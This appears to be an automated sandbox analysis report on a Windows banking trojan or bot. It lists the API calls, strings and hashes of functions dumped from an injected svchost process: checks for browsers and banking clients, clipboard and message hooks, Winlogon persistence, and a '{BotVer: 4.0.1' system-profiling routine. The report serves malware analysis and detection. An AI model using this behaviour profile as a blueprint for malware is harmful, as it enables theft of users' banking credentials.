VirtualAlloc 81295->81296 81296->81281 81303 29a1460 81296->81303 81297 29a158c 81298 29a1000 GetPEB 81297->81298 81300 29a15bd 81298->81300 81299 29a1090 GetPEB 81299->81303 81301 29a1090 GetPEB 81300->81301 81302 29a15c3 81301->81302 81304 29a12c0 GetPEB 81302->81304 81303->81297 81303->81299 81306 29a1090 GetPEB 81303->81306 81309 29a1000 GetPEB 81303->81309 81305 29a15de 81304->81305 81305->81281 81308 29a1000 GetPEB 81305->81308 81307 29a150f LoadLibraryExA 81306->81307 81307->81303 81310 29a1608 81308->81310 81309->81303 81311 29a1090 GetPEB 81310->81311 81312 29a160e 81311->81312 81313 2c86290 2063 API calls 81312->81313 81313->81281 81316 29a11d5 81314->81316

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 02C85890 Relevance: 273.9, APIs: 123, Strings: 33, Instructions: 862threadmemorylibraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C73310: IsUserAnAdmin.SHELL32 ref: 02C73335
                                                                                                                                                                                                                      • Part of subcall function 02C73310: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
                                                                                                                                                                                                                      • Part of subcall function 02C73310: PathAddBackslashA.SHLWAPI(?), ref: 02C73361
                                                                                                                                                                                                                      • Part of subcall function 02C73310: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
                                                                                                                                                                                                                      • Part of subcall function 02C73310: _snprintf.MSVCRT ref: 02C73399
                                                                                                                                                                                                                      • Part of subcall function 02C73310: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
                                                                                                                                                                                                                      • Part of subcall function 02C73310: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
                                                                                                                                                                                                                      • Part of subcall function 02C73310: RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
                                                                                                                                                                                                                      • Part of subcall function 02C93E40: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
                                                                                                                                                                                                                      • Part of subcall function 02C93E40: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
                                                                                                                                                                                                                      • Part of subcall function 02C93E40: _snprintf.MSVCRT ref: 02C93F13
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02C858B0
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02C858BB
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C858CF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C858EB
                                                                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 02C858F5
                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 02C8592D
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD888), ref: 02C8595C
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C85979
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C82140,00000000,00000000,00000000), ref: 02C859B7
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C859CF
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C859E0
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C868B0,00000000,00000000,00000000), ref: 02C85A0F
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A27
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85A38
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00016B60,00000000,00000000,00000000), ref: 02C85A4D
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,80F500EBa), ref: 02C85A61
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD8A0), ref: 02C85A70
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C864A0,00000000,00000000,00000000), ref: 02C85A84
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A94
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85AA5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C85590,00000000,00000000,00000000), ref: 02C85ABA
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85ACA
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85ADB
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C842C0,00000000,00000000,00000000), ref: 02C85B05
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C85B19
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85B2A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B39
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C85B3C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B49
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C85B4C
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C85B70
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C85B82
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                                      • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                                      • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                                      • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 02C85B8E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C85B9D
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02C85BB9
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02C85BE0
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\java.exe), ref: 02C85BF6
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02C85C0C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02C85C22
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02C85C38
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02C85C4E
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02C85C64
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02C85C7A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02C85C90
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02C85CA6
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02C85CBC
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02C85CD2
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C85CE8
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C85CFE
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8A300,00000000,00000000,00000000), ref: 02C85D2C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D46
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85D53
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8D990,00000000,00000000,00000000), ref: 02C85D68
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D7C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85D89
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8EF40,00000000,00000000,00000000), ref: 02C85D9E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DB2
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85DBF
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8F770,00000000,00000000,00000000), ref: 02C85DD4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DE8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85DF5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8E0B0,00000000,00000000,00000000), ref: 02C85E0A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E1E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85E2B
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B580,00000000,00000000,00000000), ref: 02C85E40
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E54
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85E61
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B620,00000000,00000000,00000000), ref: 02C85E76
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E8A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85E97
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8FEE0,00000000,00000000,00000000), ref: 02C85EAC
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EC0
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85ECD
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90AF0,00000000,00000000,00000000), ref: 02C85EE2
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EF6
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85F03
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C917E0,00000000,00000000,00000000), ref: 02C85F18
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F2C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85F39
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C918D0,00000000,00000000,00000000), ref: 02C85F4E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F62
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85F6F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8E890,00000000,00000000,00000000), ref: 02C85F84
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F98
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85FA5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C91AB0,00000000,00000000,00000000), ref: 02C85FBA
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85FCE
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C85FDB
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C92A30,00000000,00000000,00000000), ref: 02C85FF0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86004
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86011
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C92D50,00000000,00000000,00000000), ref: 02C86026
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8603A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86047
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C902E0,00000000,00000000,00000000), ref: 02C8605C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86070
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8607D
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C77110,00000000,00000000,00000000), ref: 02C86092
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C860AA
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C860BF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02C860D6
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02C860EC
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02C860FE
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02C86110
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02C86122
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\core.exe), ref: 02C86134
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02C86146
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02C86158
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F550,75AF7390,76230A60), ref: 02C84527
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                                      • Part of subcall function 02C844F0: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetCurrentProcessId.KERNEL32 ref: 02C76FB9
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetCurrentThreadId.KERNEL32 ref: 02C76FC8
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76FE1
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: GetUserObjectInformationA.USER32(00000000), ref: 02C76FE8
                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C76FFE
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\opera.exe,00000000), ref: 02C86183
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,RtlFreeHeap,02C84010,02CC7D38), ref: 02C8619D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C861A0
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C861B4
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 02C861D1
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C861E0
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02C861F9
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C86200
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C86216
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C7ACD0,00000000,00000000,00000000), ref: 02C8622A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8623E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8624B
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C77020,00000000,00000000,00000000), ref: 02C86260
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86274
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86281
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Thread$CreateInformation$Close$AddressHeapProcProcess$Current$ModuleUsermemset$CriticalInitializeMutexPathSection$AdminBackslashCommandDesktopFileLibraryLineLoadNameObjectOpenQueryValueVolume_snprintflstrcmpi$AllocDirectoryEnvironmentExceptionFolderFreeHandlerSystemValidateVariableVectoredWindowslstrcpyn
                                                                                                                                                                                                                    • String ID: --no-sandbox$ --no-sandbox$80F500EBa$80F503A7a$80f507eba$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 558288730-518451523
                                                                                                                                                                                                                    • Opcode ID: 433a2c88ba9fa3a6621de861ef5f472e0328b5e2094a34a13b85b5ead02266c2
                                                                                                                                                                                                                    • Instruction ID: 853c4c066e2a5854523634396e0bfcaf0d9341f37bcf380c5529ae26b42d1a77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 433a2c88ba9fa3a6621de861ef5f472e0328b5e2094a34a13b85b5ead02266c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F52E971E81355B6FB21E7A08D46FAE77AC9F84B48F618594F901B70C1DBF0DB048AA4
                                                                                                                                                                                                                    Function 02C74920 Relevance: 135.3, APIs: 56, Strings: 21, Instructions: 596filetimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 196 2c74920-2c74a59 CreateFileA 197 2c74fe4-2c74fe9 196->197 198 2c74a5f-2c74aca WriteFile * 3 GetModuleFileNameA WriteFile 196->198 199 2c74ad0-2c74ad5 198->199 199->199 200 2c74ad7-2c74b2a WriteFile * 2 GetUserNameA WriteFile 199->200 201 2c74b30-2c74b35 200->201 201->201 202 2c74b37-2c74b8d WriteFile * 2 GetEnvironmentVariableA WriteFile 201->202 203 2c74b90-2c74b95 202->203 203->203 204 2c74b97-2c74bdf WriteFile * 2 GetSystemDefaultLangID memset 203->204 205 2c74be1-2c74beb 204->205 206 2c74bf5-2c74c0b 205->206 207 2c74bed-2c74bf1 205->207 208 2c74c11-2c74c1a 206->208 207->205 209 2c74bf3 207->209 210 2c74c20-2c74c25 208->210 209->208 210->210 211 2c74c27-2c74c29 210->211 212 2c74c35-2c74c4d WriteFile 211->212 213 2c74c2b 211->213 214 2c74c50-2c74c55 212->214 213->212 214->214 215 2c74c57-2c74cd2 WriteFile * 2 GetDC GetDeviceCaps GetSystemMetrics * 2 _snprintf WriteFile 214->215 216 2c74cd5-2c74cda 215->216 216->216 217 2c74cdc-2c74d3c WriteFile * 2 GetDateFormatA WriteFile 216->217 218 2c74d40-2c74d45 217->218 218->218 219 2c74d47-2c74da4 WriteFile * 2 GetTimeFormatA WriteFile 218->219 220 2c74da7-2c74dac 219->220 220->220 221 2c74dae-2c74e5e WriteFile * 2 GetTimeZoneInformation _snprintf WriteFile 220->221 222 2c74e61-2c74e66 221->222 222->222 223 2c74e68-2c74ea9 WriteFile * 3 call 2c74070 222->223 226 2c74eb0-2c74eb5 223->226 226->226 227 2c74eb7-2c74f0d call 2c74070 WriteFile * 2 GetSystemWindowsDirectoryA WriteFile 226->227 230 2c74f10-2c74f15 227->230 230->230 231 2c74f17-2c74f5d WriteFile * 3 IsUserAnAdmin 230->231 232 2c74f64 231->232 233 2c74f5f 231->233 234 2c74f67-2c74f6c 232->234 233->232 234->234 235 2c74f6e-2c74f80 IsUserAnAdmin 234->235 236 2c74f87-2c74fbb WriteFile * 2 call 2c747e0 call 2c740f0 call 2c743e0 call 2c74630 235->236 237 2c74f82 235->237 245 2c74fc0-2c74fc6 236->245 237->236 245->197 246 2c74fc8-2c74fd5 GetHandleInformation 245->246 246->197 247 2c74fd7-2c74fdb 246->247 247->197 248 2c74fdd-2c74fde CloseHandle 247->248 248->197
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,75AF5CE0), ref: 02C74A4E
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02C73EFD,00000000,02CCB0C4), ref: 02C74A76
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,4.0.1,00000005,02C73EFD,00000000), ref: 02C74A88
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74A9A
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C74AA9
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Process: ,0000000A,02C73EFD,00000000), ref: 02C74ABF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74AEA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74AFC
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 02C74B09
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Username: ,0000000B,02C73EFD,00000000), ref: 02C74B1F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74B4A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74B5C
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02C74B6F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,02C73EFD,00000000), ref: 02C74B85
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74BAA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74BBC
                                                                                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 02C74BBE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74BD7
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Language: ,0000000B,02C73EFD,00000000), ref: 02C74C45
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74C6A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74C7C
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C74C81
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 02C74C88
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 02C74C91
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 02C74C99
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74CB1
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Screen: ,00000009,02C73EFD,00000000), ref: 02C74CCA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74CEF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D01
                                                                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02C74D1B
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Date: ,00000007,02C73EFD,00000000), ref: 02C74D31
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74D5A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D6C
                                                                                                                                                                                                                    • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02C74D86
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,02C73EFD,00000000), ref: 02C74D9C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74DC1
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74DD3
                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?), ref: 02C74DDC
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74E3D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{GMT: ,00000006,02C73EFD,00000000), ref: 02C74E56
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74E7B
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74E8D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,02C73EFD,00000000), ref: 02C74E9F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,02C73EFD,00000000), ref: 02C74ECF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74EE1
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C74EEF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,?,00000000), ref: 02C74F05
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C74F2A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74F3C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,?,00000000), ref: 02C74F4E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C74F50
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C74F73
